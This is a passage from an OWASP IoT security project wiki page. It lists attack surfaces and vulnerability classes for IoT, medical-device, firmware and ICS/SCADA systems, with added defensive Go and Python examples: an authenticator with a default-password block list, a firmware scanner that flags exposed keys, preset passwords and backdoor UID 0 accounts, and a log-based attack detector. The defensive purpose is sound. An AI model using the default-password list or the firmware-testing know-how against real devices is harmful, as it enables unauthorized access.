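	// Constructed sample of known default / trivially guessable passwords.
	bannedPasswords = map[string]bool{"1234": true, "12345": true, "123456": true,
		"password": true, "admin": true, "root": true, "default": true}
)

type account struct {
	salt, hash  []byte
	failures    int
	lockedUntil time.Time
}

type Authenticator struct {
	accounts             map[string]*account
	now                  func() time.Time // injectable clock, so lock expiry is testable
	dummySalt, dummyHash []byte           // used on the unknown-user path
}

func NewAuthenticator() *Authenticator {
	salt := newSalt()
	return &Authenticator{accounts: map[string]*account{}, now: time.Now,
		dummySalt: salt, dummyHash: hashPassword(salt, "unused")}
}

func newSalt() []byte {
	s := make([]byte, 16)
	if _, err := rand.Read(s); err != nil {
		panic(err) // no usable entropy: refuse to continue
	}
	return s
}

// hashPassword is salted, iterated SHA-256, a dependency-free stand-in.
// A shipping device should use bcrypt, scrypt or Argon2 instead.
func hashPassword(salt []byte, pw string) []byte {
	h := sha256.Sum256(append(append([]byte{}, salt...), pw...))
	for i := 1; i < hashRounds; i++ {
		h = sha256.Sum256(append(h[:], salt...))
	}
	return h[:]
}

// CheckPasswordPolicy rejects short passwords and the '1234'/'123456'/vendor
// default class outright.
func CheckPasswordPolicy(pw string) error {
	if len(pw) < 12 || bannedPasswords[pw] {
		return ErrWeakPassword
	}
	return nil
}

// Enroll stores a new account; the policy is enforced here so a weak
// password never reaches storage.
func (a *Authenticator) Enroll(user, pw string) error {
	if err := CheckPasswordPolicy(pw); err != nil {
		return err
	}
	salt := newSalt()
	a.accounts[user] = &account{salt: salt, hash: hashPassword(salt, pw)}
	return nil
}

// Login returns nil on success and ErrAuthFailed for every failure mode.
func (a *Authenticator) Login(user, pw string) error {
	acct, ok := a.accounts[user]
	if !ok {
		// Unknown user: do the same hashing work so response time matches.
		subtle.ConstantTimeCompare(hashPassword(a.dummySalt, pw), a.dummyHash)
		return ErrAuthFailed
	}
	now := a.now()
	if now.Before(acct.lockedUntil) {
		return ErrAuthFailed // locked: the response must not say so
	}
	if subtle.ConstantTimeCompare(hashPassword(acct.salt, pw), acct.hash) != 1 {
		acct.failures++
		if acct.failures >= maxFailures {
			acct.lockedUntil = now.Add(lockDuration)
			acct.failures = 0
		}
		return ErrAuthFailed
	}
	acct.failures = 0
	return nil
}
```

The lock state is deliberately never reported to the client; an "account locked" response would hand back exactly the username oracle the first row describes, so the lock is only visible in the device's own event log (see the IoT Event Logging Project tab). A lock that expires on its own, rather than one that needs an administrator, keeps the lockout from becoming a denial-of-service against legitimate users.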
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to understand the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
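The "File system analysis" step and the Firmwalker link above amount to walking the extracted root filesystem and flagging the items in the Device Firmware Vulnerabilities list before the image ships. The Go scanner below is an added example written for this page; it is not the project's code and not Firmwalker. It represents the extracted filesystem as an in-memory path-to-contents map so it runs without a real image, the /etc/passwd, /etc/shadow, key and config contents are constructed, and the two regular expressions are a deliberately small sample of the patterns a full scanner would carry.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// Image is an extracted root filesystem as path -> contents. A real run would
// walk the directory that binwalk or the Firmware Modification Kit produced.
type Image map[string]string

// Finding.Check names the row of the "Device Firmware Vulnerabilities" list.
type Finding struct {
	Check string
	Path  string
	Line  int // 1-based; 0 when the whole file is the finding
	Note  string
}

const credsCheck = "Hardcoded or easy to guess credentials"

var (
	privateKeyRe = regexp.MustCompile(`-----BEGIN (?:RSA |EC |OPENSSH |)PRIVATE KEY-----`)
	configPassRe = regexp.MustCompile(`(?i)^\s*(?:password|passwd|secret|api_key)\s*[=:]\s*\S+`)
)

// ScanImage walks the image in path order and collects findings.
func ScanImage(img Image) []Finding {
	paths := make([]string, 0, len(img))
	for p := range img {
		paths = append(paths, p)
	}
	sort.Strings(paths) // deterministic report order
	var out []Finding
	for _, p := range paths {
		content := img[p]
		if privateKeyRe.MatchString(content) {
			out = append(out, Finding{"Encryption key exposure", p, 0, "private key material shipped in image"})
		}
		switch p {
		case "/etc/shadow":
			out = append(out, scanShadow(p, content)...)
		case "/etc/passwd":
			out = append(out, scanPasswd(p, content)...)
		}
		if strings.HasPrefix(p, "/etc/") || strings.HasSuffix(p, ".conf") {
			for i, line := range strings.Split(content, "\n") {
				if configPassRe.MatchString(line) {
					out = append(out, Finding{credsCheck, p, i + 1, "literal secret in config file"})
				}
			}
		}
	}
	return out
}

// scanShadow flags accounts that ship with a usable password. A hash field
// starting with "*" or "!" is a locked account; an empty field is no password.
func scanShadow(path, content string) []Finding {
	var out []Finding
	for i, line := range strings.Split(content, "\n") {
		f := strings.Split(line, ":")
		if len(f) < 2 {
			continue
		}
		switch h := f[1]; {
		case h == "":
			out = append(out, Finding{credsCheck, path, i + 1, f[0] + " has an empty password"})
		case !strings.HasPrefix(h, "*") && !strings.HasPrefix(h, "!"):
			out = append(out, Finding{credsCheck, path, i + 1, f[0] + " ships with a preset password hash"})
		}
	}
	return out
}

// scanPasswd flags any UID 0 account other than root, the classic backdoor.
func scanPasswd(path, content string) []Finding {
	var out []Finding
	for i, line := range strings.Split(content, "\n") {
		if f := strings.Split(line, ":"); len(f) >= 3 && f[2] == "0" && f[0] != "root" {
			out = append(out, Finding{"Backdoor accounts", path, i + 1, f[0] + " has UID 0"})
		}
	}
	return out
}

// SampleImage is a constructed image with one instance of each problem.
func SampleImage() Image {
	return Image{
		"/etc/passwd":           "root:x:0:0:root:/root:/bin/sh\nsupport:x:0:0:vendor:/:/bin/sh\nnobody:x:65534:65534::/:/bin/false\n",
		"/etc/shadow":           "root:$1$constructed$hashvalue:17000:0:99999:7:::\nsupport:!:17000:0:99999:7:::\nguest::17000:0:99999:7:::\n",
		"/etc/ssl/device.key":   "-----BEGIN RSA PRIVATE KEY-----\nMIIconstructed\n-----END RSA PRIVATE KEY-----\n",
		"/etc/cloud-agent.conf": "endpoint=https://example.invalid\napi_key=constructed-placeholder-token\n",
		"/www/index.html":       "<html>ok</html>",
	}
}

func main() {
	for _, f := range ScanImage(SampleImage()) {
		fmt.Printf("%-40s %s:%d %s\n", f.Check, f.Path, f.Line, f.Note)
	}
}
```

Run against a release candidate, the same checks enforce three of the Manufacturer Recommendations above (no hard-coded passwords or hashes, no easy-to-guess admin credentials, no exposed keys) rather than merely discovering the problems after a device is in the field.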
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events ==<br />
<br />
This is a working draft of the recommended minimum set of IoT device logging events. It covers many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
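As an added example that is not part of the OWASP draft, the following Python detector shows how a device could derive several of the listed events (unsupported HTTP method, multiple failed passwords, high login rate, source-location change within a session, honey trap resource requested) from its own raw request log instead of leaving that correlation to a downstream SIEM. The log-line format, the thresholds (5 failures, 10 login attempts per 60 s) and the decoy path are assumptions chosen for illustration, and the sample log is constructed.<br />

```python
"""Derive OWASP-style IoT logging events from a device's raw request log.

Added example, not code from the OWASP IoT project. The line format,
thresholds and decoy path below are assumptions chosen for illustration.
"""
import re
from collections import defaultdict, deque

# Constructed line format: "<epoch> <source-ip> <country> <method> <path> <result>"
LINE_RE = re.compile(
    r"^(?P<ts>\d+) (?P<ip>[\d.]+) (?P<geo>[A-Z]{2}) (?P<method>[A-Z]+) "
    r"(?P<path>\S+) (?P<result>\S+)$"
)

SUPPORTED_METHODS = {"GET", "POST"}
FAILED_PASSWORD_THRESHOLD = 5        # "Multiple Failed Passwords" (assumed threshold)
LOGIN_RATE_THRESHOLD = 10            # "High Rate of Login Attempts" (assumed threshold)
LOGIN_RATE_WINDOW_SECONDS = 60
HONEY_TRAP_PATHS = {"/admin-backup.tar"}  # constructed decoy resource


class IoTEventDetector:
    """Stateful detector mapping raw request lines onto the draft's event names."""

    def __init__(self):
        self.failed_passwords = defaultdict(int)   # ip -> consecutive auth failures
        self.login_times = defaultdict(deque)      # ip -> timestamps of login attempts
        self.session_geo = {}                      # session token -> country first seen
        self.malformed = 0                         # lines that did not match LINE_RE
        self.events = []

    def _emit(self, category, event, ip, ts):
        self.events.append({"ts": ts, "ip": ip, "category": category, "event": event})

    def feed(self, line):
        m = LINE_RE.match(line)
        if not m:
            self.malformed += 1        # unparsable lines are counted, not guessed at
            return
        ts, ip, geo = int(m["ts"]), m["ip"], m["geo"]
        method, path, result = m["method"], m["path"], m["result"]

        # Request Exceptions: verb the device never serves
        if method not in SUPPORTED_METHODS:
            self._emit("Request Exceptions",
                       "Attempt to Invoke Unsupported HTTP Method", ip, ts)

        # Honey Trap Exceptions: nobody legitimate asks for the decoy
        if path in HONEY_TRAP_PATHS:
            self._emit("Honey Trap Exceptions", "Honey Trap Resource Requested", ip, ts)

        if path == "/login":
            # Authentication Exceptions: sliding window of attempts per source
            window = self.login_times[ip]
            window.append(ts)
            while window and ts - window[0] > LOGIN_RATE_WINDOW_SECONDS:
                window.popleft()
            if len(window) == LOGIN_RATE_THRESHOLD:   # emit once, when first crossed
                self._emit("Authentication Exceptions",
                           "High Rate of Login Attempts", ip, ts)
            if result == "auth-fail":
                self.failed_passwords[ip] += 1
                if self.failed_passwords[ip] == FAILED_PASSWORD_THRESHOLD:
                    self._emit("Authentication Exceptions",
                               "Multiple Failed Passwords", ip, ts)
            elif result.startswith("session="):
                self.failed_passwords[ip] = 0          # successful login resets the counter
                self.session_geo[result] = geo         # remember where the session started
        elif result.startswith("session="):
            # Session Exceptions: same session token, different source country
            first_geo = self.session_geo.setdefault(result, geo)
            if first_geo != geo:
                self._emit("Session Exceptions",
                           "Source Location Changes During Session", ip, ts)


def detect_events(log_text):
    """Run the detector over newline-separated log lines and return the events."""
    detector = IoTEventDetector()
    for line in log_text.splitlines():
        if line.strip():
            detector.feed(line)
    return detector.events


# Constructed sample log (documentation/test address ranges only).
SAMPLE_LOG = """\
1000 10.0.0.5 DE GET /status 200
1001 10.0.0.5 DE TRACE /status 405
1002 203.0.113.7 US POST /login auth-fail
1003 203.0.113.7 US POST /login auth-fail
1004 203.0.113.7 US POST /login auth-fail
1005 203.0.113.7 US POST /login auth-fail
1006 203.0.113.7 US POST /login auth-fail
1007 198.51.100.9 FR POST /login session=abc123
1008 198.51.100.9 FR GET /status session=abc123
1009 198.51.100.9 BR GET /status session=abc123
1010 10.0.0.5 DE GET /admin-backup.tar 404
"""

if __name__ == "__main__":
    for e in detect_events(SAMPLE_LOG):
        print(f"{e['ts']} {e['ip']:<14} {e['category']}: {e['event']}")
```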
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to feed a solid detection and response program around IoT devices, and companies that want to do this have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}<br />
{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoTGoat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]]<br />
<br />
For more information on getting started, visit the project's GitHub: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
